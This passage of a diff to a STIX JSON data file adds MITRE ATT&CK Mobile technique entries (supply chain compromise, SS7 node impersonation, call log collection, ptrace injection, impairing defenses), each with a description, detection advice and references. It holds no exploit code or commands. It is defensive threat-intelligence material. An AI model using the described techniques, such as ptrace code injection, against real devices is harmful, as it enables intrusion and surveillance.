These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. Users can see a list of applications that can use accessibility services in the device settings. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "created": "2022-03-30T19:28:25.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630", + "external_id": "T1630" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:52:29.947Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate 
products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. 
Application vetting could detect the usage of insecure or malicious third-party libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474", + "external_id": "T1474" + }, + { + "source_name": "Grace-Advertisement", + "description": "M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.", + "url": "https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf" + }, + { + "source_name": "NowSecure-RemoteCode", + "description": "Ryan Welton. (2015, June 15). A Pattern for Remote Code Execution using Arbitrary File Writes and MultiDex Applications. 
Retrieved December 22, 2016.", + "url": "https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html", + "external_id": "APP-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html", + "external_id": "SPC-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html", + "external_id": "SPC-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html", + "external_id": "SPC-2" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html", + "external_id": "SPC-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html", + "external_id": "SPC-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html", + "external_id": "SPC-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html", + "external_id": "SPC-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html", + "external_id": "SPC-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": 
"https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html", + "external_id": "SPC-9" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html", + "external_id": "SPC-10" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html", + "external_id": "SPC-11" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html", + "external_id": "SPC-12" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html", + "external_id": "SPC-13" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html", + "external_id": "SPC-14" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html", + "external_id": "SPC-15" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html", + "external_id": "SPC-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html", + "external_id": "SPC-17" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html", + "external_id": "SPC-18" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html", + "external_id": "SPC-19" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": 
"https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html", + "external_id": "SPC-20" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html", + "external_id": "SPC-21" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:41:45.256Z", + "name": "Impersonate SS7 Nodes", + "description": "Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) \n\n \n\nBy providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", 
+ "created": "2022-04-05T19:49:58.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/002", + "external_id": "T1430.002" + }, + { + "source_name": "3GPP-Security", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf" + }, + { + "source_name": "Engel-SS7-2008", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI" + }, + { + "source_name": "Engel-SS7", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. 
Retrieved December 19, 2016.", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "external_id": "CEL-38" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799", + "type": "attack-pattern", + "created": "2017-10-25T14:48:30.462Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1425", + "external_id": "T1425" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "Insecure Third-Party Libraries", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:56:20.270Z", + "name": "Protected User Data", + "description": "Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s `Info.plist` file. \n\n \n\nIn almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user’s knowledge or approval. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as `RECEIVE_SMS`, could receive additional scrutiny.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "created": "2022-04-01T12:36:41.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636", + "external_id": "T1636" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "created": "2022-04-05T20:15:43.636Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.002", + "url": "https://attack.mitre.org/techniques/T1521/002" + } + ], + "x_mitre_deprecated": 
false, + "revoked": false, + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).", + "modified": "2022-04-05T20:16:21.324Z", + "name": "Asymmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:03.477Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of applications that are installed on a device. 
Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions. \n\n \n\nAdversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "created": "2017-10-25T14:48:28.067Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418", + "external_id": "T1418" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:23.702Z", + "name": "Process 
Discovery", + "description": "Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. \n\n \n\nRecent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the `hidepid` mount feature. Prior to Android 7, applications could utilize the `ps` command or examine the `/proc` directory on the device.(Citation: Android-SELinuxChanges) \n\n \n\nIn iOS, applications have previously been able to use the `sysctl` command to obtain a list of running processes. This functionality has been removed in later iOS versions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. 
Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "created": "2017-10-25T14:48:33.926Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1424", + "external_id": "T1424" + }, + { + "source_name": "Android-SELinuxChanges", + "description": "Various. (2016, March 31). Overly restrictive SELinux filesystem permissions in Android N. Retrieved December 21, 2016.", + "url": "https://code.google.com/p/android/issues/detail?id=205565" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:32:30.150Z", + "name": "Call Log", + "description": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user’s knowledge or approval. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application’s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "created": "2022-04-01T13:12:23.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/002", + "external_id": "T1636.002" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:33.642Z", + "name": "Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. 
Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "created": "2022-03-31T19:50:45.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418/001", + "external_id": "T1418.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:10.699Z", + "revoked": true, + "external_references": [ + { + 
"source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1434", + "external_id": "T1434" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Email Attachment", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:57:40.571Z", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target process's memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. 
Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for misuse of dynamic libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "created": "2022-03-30T19:05:17.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1631/001", + "external_id": "T1631.001" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. 
Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:59:55.849Z", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running. 
Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "created": "2022-04-01T18:42:22.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629", + "external_id": "T1629" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Lukáš Štefanko, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "external_id": "T1453", + "url": "https://attack.mitre.org/techniques/T1453" + }, + { + "url": 
